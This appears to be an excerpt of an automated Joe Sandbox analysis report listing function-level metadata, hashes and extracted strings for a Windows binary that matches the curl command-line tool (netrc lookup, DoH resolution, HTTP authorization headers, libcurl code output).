                            • Opcode ID: 99ea761d28b92abdb23448e4b955d4d9075c6c2b7eebe52f541756a2fccc62b4
                            • Instruction ID: 5a326e23cd052df5e8845cd72e2c9f228c27474f5f29dc9ac22de4448524508f
                            • Opcode Fuzzy Hash: 99ea761d28b92abdb23448e4b955d4d9075c6c2b7eebe52f541756a2fccc62b4
                            • Instruction Fuzzy Hash: 2F316161E0864380EB54EB5594403FAA3B09F64B88FD4A032C92E47BC8DFBCE54587E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_func$_errnoferrorfreadstrerror
                            • String ID: stdin: %s
                            • API String ID: 2463866935-3123201360
                            • Opcode ID: 5ca1bf91eea2be8477dae442d6923a079f7cac26a512d9b0cf8293ae176da189
                            • Instruction ID: 34d059aa8cd19503f0e7b9baf7f1f0e67c8c7bbcdafc9d90dcfab130f6ee15f1
                            • Opcode Fuzzy Hash: 5ca1bf91eea2be8477dae442d6923a079f7cac26a512d9b0cf8293ae176da189
                            • Instruction Fuzzy Hash: B621D671B0974282EB44AB12A644329A374EF58FD1F844634DD2D43BD9DFBCE040C391
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$_mbschr_strdup$_mbsnbcpy
                            • String ID:
                            • API String ID: 698015193-0
                            • Opcode ID: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
                            • Instruction ID: a04aa0c84044bfdce9bca69c334ade73a537b94502aaa28b775f0b404c9d1bff
                            • Opcode Fuzzy Hash: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
                            • Instruction Fuzzy Hash: B9415E21A19B4285EB15EF12A844678B7A4AF89BD1F595935CE6E073D0EFBCF081C390
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: htons
                            • String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
                            • API String ID: 4207154920-4260076447
                            • Opcode ID: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
                            • Instruction ID: 328efcab7a3315a403971aedc042ec2e991018aba9d3ef2357c84b983860c413
                            • Opcode Fuzzy Hash: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
                            • Instruction Fuzzy Hash: DFC1D172A08A8186EB14EF15E4406AEB3B4FB84B85F80813ADE6E477D4DFBCD544C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _scwprintf.LIBCMT ref: 00007FF7F1DB9F0E
                            • _scwprintf.LIBCMT ref: 00007FF7F1DB9F7B
                              • Part of subcall function 00007FF7F1DD0804: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00010A0007FFFFBC,00000198,?,00000190,?,00000000,00000000,?,00007FF7F1DBA023), ref: 00007FF7F1DD0892
                              • Part of subcall function 00007FF7F1DD0804: fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DD08B3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf$fgetsfopen
                            • String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
                            • API String ID: 2363167223-3314400472
                            • Opcode ID: bb18ee0aaabf0a42b5b598fae93f6e3c6482430532e28f7d5a10b3aa84831cc3
                            • Instruction ID: 2cf90aafff031e7f30d897ac4814d687f74bab7ed93602205dd22eb7746ea40a
                            • Opcode Fuzzy Hash: bb18ee0aaabf0a42b5b598fae93f6e3c6482430532e28f7d5a10b3aa84831cc3
                            • Instruction Fuzzy Hash: D9B15D25A09B8695EB59EF15E8502A9A3B0FF48BC5F844131DE6E077E5DFBCE410C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
                            • API String ID: 1992661772-3948863929
                            • Opcode ID: 3057447337bc7947ce81546a1208f78a363fc2215dd63e4f8c01a3ac91c1a0ee
                            • Instruction ID: e6d41bbe3f01047d8c1313fa35447f2589bb358976b1c09c8ca333843d7c26d8
                            • Opcode Fuzzy Hash: 3057447337bc7947ce81546a1208f78a363fc2215dd63e4f8c01a3ac91c1a0ee
                            • Instruction Fuzzy Hash: CB91BE32A08B4685EB04EF65E8506E9B7B4FB48B88F840036DE1D47798DFBDD545C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: Access denied. %c$Authentication cancelled$Authentication failed: %d$PASS %s$STARTTLS denied
                            • API String ID: 0-2817885744
                            • Opcode ID: ee4743e4ef2d11664396d9aed294599e35e50b8bfabc09a92b6a42d5e451a3d4
                            • Instruction ID: 74df4597acab7231cf4375aed5b2115f5d6a7f90aa60f6ead90584227e7b591b
                            • Opcode Fuzzy Hash: ee4743e4ef2d11664396d9aed294599e35e50b8bfabc09a92b6a42d5e451a3d4
                            • Instruction Fuzzy Hash: 17718221E1C64395EF64BA2990443B9B3B9EF81780FD84131D92E476E9CFACF495C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncmpstrtol
                            • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                            • API String ID: 826613874-4202423297
                            • Opcode ID: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
                            • Instruction ID: c43df3154ab63da09d2e7195d51cc272f8179e2438b170a314753035205a322a
                            • Opcode Fuzzy Hash: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
                            • Instruction Fuzzy Hash: E151E122E0D68664EB19EF1994541B8A7B1AF06B80FC44032C97F073D5DFEDE44AD3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$mallocstrncmpstrncpy
                            • String ID: \\?\$|<>"?*
                            • API String ID: 2141947759-3264285191
                            • Opcode ID: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
                            • Instruction ID: 9dbe94152cba590a320ebdb65eceb2472516d4de4ac59ada112152935eb263d2
                            • Opcode Fuzzy Hash: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
                            • Instruction Fuzzy Hash: 8151A122E0C78345FB666E16A940339E6B0AF45B94FC88138DE7D066D5DFFCE44283A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000200,00000230,00007FF7F1DAA7F7), ref: 00007FF7F1DA8D41
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000200,00000230,00007FF7F1DAA7F7), ref: 00007FF7F1DA8D7A
                            • inet_pton.WS2_32 ref: 00007FF7F1DA8E20
                            • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000200,00000230,00007FF7F1DAA7F7), ref: 00007FF7F1DA8EC9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: inet_ptonstrcspnstrncmpstrspn
                            • String ID: /:#?!@$0123456789abcdefABCDEF:.
                            • API String ID: 3548342379-4134865206
                            • Opcode ID: bb44e831456dfa347d751db6e0baa9830d5133fbc23f8f1b71ac9e1147d56e42
                            • Instruction ID: f825d015b3b02191798cb042aceab69af688ec6c597d2bef90b10c6ba9285180
                            • Opcode Fuzzy Hash: bb44e831456dfa347d751db6e0baa9830d5133fbc23f8f1b71ac9e1147d56e42
                            • Instruction Fuzzy Hash: B951E312A0C68684FF25EF269404279ABB0AB15B96F844131DFBE037D6DFBDE545C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _close$_fstat64_open_write
                            • String ID: Can't get the size of %s$Can't open %s for writing
                            • API String ID: 1186923665-3544860555
                            • Opcode ID: 16d69abb4339eb507fe5fffd3098c74bcc41c51caf0da414e85ee2bb5c6d9b63
                            • Instruction ID: 276b3a8067277207eb3749998fb2e6c9b29dd5ecd1240e0f43f31387969d45d1
                            • Opcode Fuzzy Hash: 16d69abb4339eb507fe5fffd3098c74bcc41c51caf0da414e85ee2bb5c6d9b63
                            • Instruction Fuzzy Hash: CE51B662B08B8281EB15EB26D4102B9B3B1FB44B94F984535DE6E477C9DFBDE40187A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_funcfclosefopen
                            • String ID: %s$%s$Failed to open %s to write libcurl code!
                            • API String ID: 4110152555-3591596397
                            • Opcode ID: 9bb9e9f3ef58bb71e99986d0be79de901c3d8e6fbc98846f6b4c6d1ec7676dee
                            • Instruction ID: 805cfcabb2eb5fe1a8eb0f0391c43ee69abb837ada17401fe6975cf3a5bcbef3
                            • Opcode Fuzzy Hash: 9bb9e9f3ef58bb71e99986d0be79de901c3d8e6fbc98846f6b4c6d1ec7676dee
                            • Instruction Fuzzy Hash: C7511B25A0DB82A1EB15AB12A6002B9E371AF05BC0FC85036CA7D177D9DFACF551C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: fputcfputs
                            • String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)
                            • API String ID: 269475090-2180745030
                            • Opcode ID: e4f82768c1415edb8038a37158da27c1e033b0c683fe8c182233a3f2ef40f5af
                            • Instruction ID: 679fb55afb9da53f482556d98fd84e9e6cefbf08db800b56bafe7bacc8c29745
                            • Opcode Fuzzy Hash: e4f82768c1415edb8038a37158da27c1e033b0c683fe8c182233a3f2ef40f5af
                            • Instruction Fuzzy Hash: C941A561F0869585EBA0AB15A944279E3B5BB41BA4FC84531CE7E037C9CFBCF045C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
                            • API String ID: 1992661772-3976116069
                            • Opcode ID: 5b09aa6f8acaafc9d2de3519143bf6550a570d9705a8426d8d1e31a313ac39ec
                            • Instruction ID: dbb082e3521c8e1d1cb56ecad778662613b425fb4bc33d76bffae7855a4b3658
                            • Opcode Fuzzy Hash: 5b09aa6f8acaafc9d2de3519143bf6550a570d9705a8426d8d1e31a313ac39ec
                            • Instruction Fuzzy Hash: 0C519E32A08B4692EB14EF05E8402A9B7B4FB89F80F944035EE6E47794DFBDE555C390
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: SASL$STLS$STLS$STLS not supported.$USER
                            • API String ID: 1488884202-1896462950
                            • Opcode ID: 56932373f36a1059633d90e32581f86ed922a46cf3101ca90690ffdae4112696
                            • Instruction ID: bf5e104d18e71e1abebb31c8fd9e9d9297e87972da5d6737c6655bd74183fca1
                            • Opcode Fuzzy Hash: 56932373f36a1059633d90e32581f86ed922a46cf3101ca90690ffdae4112696
                            • Instruction Fuzzy Hash: 2441F261E0C6C385FB21EA15A54427DFBBAEB05B90F950131C67D829C8EFBDF48183A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_lcallocfreemalloc
                            • String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
                            • API String ID: 1630718902-2317922172
                            • Opcode ID: cd249fb2a47352c363024ae0d3021c38bc92ce0e3188c2f15876eedc7459387d
                            • Instruction ID: c2a8897d8df595769e3093be49210e0406442cca584de43e02668e2f023d0448
                            • Opcode Fuzzy Hash: cd249fb2a47352c363024ae0d3021c38bc92ce0e3188c2f15876eedc7459387d
                            • Instruction Fuzzy Hash: 0631B52260974646F711EF12E8107BAB3B0BB45B94F944235DD6D077C6EFBCE4419350
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$_strdup
                            • String ID: Got more output options than URLs$out of memory
                            • API String ID: 2653869212-1666425204
                            • Opcode ID: 8388426265b27c7dbcea842a724ae09ae9d951d9cc84d8c183ac72d3789195c5
                            • Instruction ID: 2b8b12fcde19a7e5056e6cd1315cce537c81367838a00a958c3b113b810e0467
                            • Opcode Fuzzy Hash: 8388426265b27c7dbcea842a724ae09ae9d951d9cc84d8c183ac72d3789195c5
                            • Instruction Fuzzy Hash: 4D41D12260AB8282E709EB21A1446BEB7B4FB45784FC14035CF6E073D5DFB8A065C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _gmtime64
                            • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                            • API String ID: 1355024304-4153637960
                            • Opcode ID: 06172f87adf56489ae05b08d51bb03f2f251ee77c9de8d506fae82ab576a955e
                            • Instruction ID: b9716ec4d242bc5b683c9417b58f2de3381df0e90981e3ce6efb2c48d8d27f4c
                            • Opcode Fuzzy Hash: 06172f87adf56489ae05b08d51bb03f2f251ee77c9de8d506fae82ab576a955e
                            • Instruction Fuzzy Hash: A241A532A187428AE720EB19E4407AAF3B1FB94790F900631EA6D477D5DFBDE501CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: %*s$%s%ldL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
                            • API String ID: 1488884202-3167448197
                            • Opcode ID: d883462d4f363a7398a52ea1896f0bdb0d4288d449e206b74f2286734631dcfb
                            • Instruction ID: 1137f44db40ad8eb57b63a6854d1101d304bc875dd2bf187115b642e58a7fe68
                            • Opcode Fuzzy Hash: d883462d4f363a7398a52ea1896f0bdb0d4288d449e206b74f2286734631dcfb
                            • Instruction Fuzzy Hash: 4B313F22A18A4795EB50EB15E8103E5A3B4EB84755FC81132D97D873D9EFBCE608C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: %s:%s$%sAuthorization: Basic %s$Basic$Proxy-
                            • API String ID: 1992661772-2466770355
                            • Opcode ID: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
                            • Instruction ID: bba1639f3d90c6ebe80a730cb7c09db39c0b909f47e5536fc603ef1edb93d2b0
                            • Opcode Fuzzy Hash: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
                            • Instruction Fuzzy Hash: 59316121A08A4682EB05EB15E4943A9A3B0FB85B91F944631DE3D477E4DFBCE506C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • getpeername.WS2_32 ref: 00007FF7F1DB3256
                            • WSAGetLastError.WS2_32 ref: 00007FF7F1DB3260
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
